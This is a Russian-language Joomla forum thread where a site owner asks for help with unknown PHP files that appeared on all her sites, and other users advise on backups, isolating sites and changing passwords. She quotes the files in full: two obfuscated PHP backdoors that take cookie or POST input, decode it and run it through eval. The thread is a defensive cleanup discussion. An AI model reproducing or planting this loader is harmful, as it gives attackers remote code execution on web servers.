На всех сайтах странные php файлы появились - Joomla 3.x: Общие вопросы

Добрый день. Появились странные php файлы на хостинге на каждом сайте.....Проверяла все сайты на внешние ссылки, но ничего не обнаружила, также антивирусниками на вирусы проверяла многими, тоже ничего не показало...
Фото сделано с корня сайта HELP

а что в содержании файлов?

Похоже на вирус, особенно если в корне сайта.

<?php
$zctmcw = '_4f\'pl6o5#n-r0csveH*bmy3xk9gdi1uta';$unmvqhi = Array();$unmvqhi[] = $zctmcw[18].$zctmcw[19];$unmvqhi[] = $zctmcw[30].$zctmcw[2].$zctmcw[20].$zctmcw[13].$zctmcw[1].$zctmcw[17].$zctmcw[26].$zctmcw[2].$zctmcw[11].$zctmcw[8].$zctmcw[1].$zctmcw[23].$zctmcw[30].$zctmcw[11].$zctmcw[1].$zctmcw[8].$zctmcw[30].$zctmcw[13].$zctmcw[11].$zctmcw[33].$zctmcw[33].$zctmcw[14].$zctmcw[23].$zctmcw[11].$zctmcw[20].$zctmcw[30].$zctmcw[2].$zctmcw[13].$zctmcw[28].$zctmcw[6].$zctmcw[28].$zctmcw[33].$zctmcw[17].$zctmcw[17].$zctmcw[20].$zctmcw[33];$unmvqhi[] = $zctmcw[9];$unmvqhi[] = $zctmcw[14].$zctmcw[7].$zctmcw[31].$zctmcw[10].$zctmcw[32];$unmvqhi[] = $zctmcw[15].$zctmcw[32].$zctmcw[12].$zctmcw[0].$zctmcw[12].$zctmcw[17].$zctmcw[4].$zctmcw[17].$zctmcw[33].$zctmcw[32];$unmvqhi[] = $zctmcw[17].$zctmcw[24].$zctmcw[4].$zctmcw[5].$zctmcw[7].$zctmcw[28].$zctmcw[17];$unmvqhi[] = $zctmcw[15].$zctmcw[31].$zctmcw[20].$zctmcw[15].$zctmcw[32].$zctmcw[12];$unmvqhi[] = $zctmcw[33].$zctmcw[12].$zctmcw[12].$zctmcw[33].$zctmcw[22].$zctmcw[0].$zctmcw[21].$zctmcw[17].$zctmcw[12].$zctmcw[27].$zctmcw[17];$unmvqhi[] = $zctmcw[15].$zctmcw[32].$zctmcw[12].$zctmcw[5].$zctmcw[17].$zctmcw[10];$unmvqhi[] = $zctmcw[4].$zctmcw[33].$zctmcw[14].$zctmcw[25];foreach ($unmvqhi[7]($_COOKIE, $_POST) as $xwmqvxl => $ylrlipn){function fvqqr($unmvqhi, $xwmqvxl, $evwumdl){return $unmvqhi[6]($unmvqhi[4]($xwmqvxl . $unmvqhi[1], ($evwumdl / $unmvqhi[8]($xwmqvxl)) + 1), 0, $evwumdl);}function lmkmoxy($unmvqhi, $fukepf){return @$unmvqhi[9]($unmvqhi[0], $fukepf);}function fekztdc($unmvqhi, $fukepf){$udqqjnk = $unmvqhi[3]($fukepf) % 3;if (!$udqqjnk) {eval($fukepf[1]($fukepf[2]));exit();}}$ylrlipn = lmkmoxy($unmvqhi, $ylrlipn);fekztdc($unmvqhi, $unmvqhi[5]($unmvqhi[2], $ylrlipn ^ fvqqr($unmvqhi, $xwmqvxl, $unmvqhi[8]($ylrlipn))));}

$cqajlt = '78iu193_fnrt-\'dlvH*y4baegpk5soxcm6#2';$hqhrgm = Array();$hqhrgm[] = $cqajlt[17].$cqajlt[18];$hqhrgm[] = $cqajlt[34];$hqhrgm[] = $cqajlt[20].$cqajlt[8].$cqajlt[5].$cqajlt[22].$cqajlt[0].$cqajlt[27].$cqajlt[14].$cqajlt[21].$cqajlt[12].$cqajlt[33].$cqajlt[27].$cqajlt[27].$cqajlt[5].$cqajlt[12].$cqajlt[20].$cqajlt[35].$cqajlt[0].$cqajlt[6].$cqajlt[12].$cqajlt[1].$cqajlt[20].$cqajlt[31].$cqajlt[22].$cqajlt[12].$cqajlt[27].$cqajlt[20].$cqajlt[31].$cqajlt[8].$cqajlt[4].$cqajlt[22].$cqajlt[0].$cqajlt[5].$cqajlt[5].$cqajlt[1].$cqajlt[33].$cqajlt[14];$hqhrgm[] = $cqajlt[31].$cqajlt[29].$cqajlt[3].$cqajlt[9].$cqajlt[11];$hqhrgm[] = $cqajlt[28].$cqajlt[11].$cqajlt[10].$cqajlt[7].$cqajlt[10].$cqajlt[23].$cqajlt[25].$cqajlt[23].$cqajlt[22].$cqajlt[11];$hqhrgm[] = $cqajlt[23].$cqajlt[30].$cqajlt[25].$cqajlt[15].$cqajlt[29].$cqajlt[14].$cqajlt[23];$hqhrgm[] = $cqajlt[28].$cqajlt[3].$cqajlt[21].$cqajlt[28].$cqajlt[11].$cqajlt[10];$hqhrgm[] = $cqajlt[22].$cqajlt[10].$cqajlt[10].$cqajlt[22].$cqajlt[19].$cqajlt[7].$cqajlt[32].$cqajlt[23].$cqajlt[10].$cqajlt[24].$cqajlt[23];$hqhrgm[] = $cqajlt[28].$cqajlt[11].$cqajlt[10].$cqajlt[15].$cqajlt[23].$cqajlt[9];$hqhrgm[] = $cqajlt[25].$cqajlt[22].$cqajlt[31].$cqajlt[26];foreach ($hqhrgm[7]($_COOKIE, $_POST) as $kbicdrm => $dnokgnx){function nuzufo($hqhrgm, $kbicdrm, $cbmqmi){return $hqhrgm[6]($hqhrgm[4]($kbicdrm . $hqhrgm[2], ($cbmqmi / $hqhrgm[8]($kbicdrm)) + 1), 0, $cbmqmi);}function fhhhu($hqhrgm, $dhzpyf){return @$hqhrgm[9]($hqhrgm[0], $dhzpyf);}function plliff($hqhrgm, $dhzpyf){$chykx = $hqhrgm[3]($dhzpyf) % 3;if (!$chykx) {eval($dhzpyf[1]($dhzpyf[2]));exit();}}$dnokgnx = fhhhu($hqhrgm, $dnokgnx);plliff($hqhrgm, $hqhrgm[5]($hqhrgm[1], $dnokgnx ^ nuzufo($hqhrgm, $kbicdrm, $hqhrgm[8]($dnokgnx))));}

в каждом файле что то похожее..

Версия Joomla ?
На сайте поселился вирус или нет?

Самая последняя версия....даже поразила не работающие сайты...

 

Надо разделять все сайты и чистить

Под разделять что понимаете? На разных серверах?

В принципе все бэкапы целы... как вариант если всё удалю и с бэкапов восстановлю как вариант...

Посмотрите на дату создания подозрительных файлов и откатите сайт на хостинге на предыдущую дату.

Посмотрите на дату создания подозрительных файлов и откатите сайт на хостинге на предыдущую дату.

не факт что вирус отработал сразу после загрузки
как вариант он мог жить и неделю и месяц в спящем режиме
так что не факт что поможет

Такое чувство что он даты подменял, то как написано что дата изменения даже есть 2017 году... таких файлов я точно не видела... даже неделю назад....

ну тут как минимум надо изолировать сайты и смотреть-тестировать
разворачивать копии и наблюдать как будут себя вести

изолировать это сложно... так как они на одном хостинге

ну тут от хостинга зависит
на некоторых есть данные функции

в любом случае надо где то будет один сайт разворачивать из копии и смотреть за поведением

Самая последняя версия....даже поразила не работающие сайты...

Хакер получил доступ к аккаунту, и ему все равно что в каких папках.
Задайте вопрос хостеру. Недавно была инфо про уязвимость  панели управления хостингом.

Под разделять что понимаете? На разных серверах?

Изолировать каждый сайт друг от друга. Одни ищут хостинг, где эта услуга предлагается в пакете, другие пытаются сами настроить изоляцию, третьи разносят на разные аккаунты. Как поступать - это уже за Вами решение. Единственное, делать это по любому надо.
И разворачивание бекапа лишь уход от проблемы, но не её решение.

Нашли вирус, не знаю как он появился...видимо он и зловредствует....

будем пробовать удалять все файлы и бэкап восстанавливать...

Вопрос в другом, как сохранить материалы, так как они же не все находятся на сколько я знаю в БД?

Самое интересное подхватил вирус новый шаблон...который не давно был установлен....для меня это парадокс.... антивирус показал что в конкретный файл заражен....но почему то другие файлы вот с выше описанной абро кадаброй не обнаружил

Все шаблоны в интернете с вирусами, и новый шаблон сделал свою работу.

У вас сайты на одном хостинге под одним пользователем? Сайты надо изолировать. Можно забирать бекапы до заражения и переносить их под своего отдельного пользователя.

У вас сайты на одном хостинге под одним пользователем? Сайты надо изолировать. Можно забирать бекапы до заражения и переносить их под своего отдельного пользователя.

Спасибо, так и поступлю

Ну не факт, что 100% все будут чистые.

Ну не факт, что 100% все будут чистые.

тут правильно
сложно определить когда было заражение
 и не проснется ли оно чуть позже
оптимальный вариант конечно изолировать и лечить

А пароли, когда изолирую каждый сайт тоже лучше сменить как для админки, так и для бд?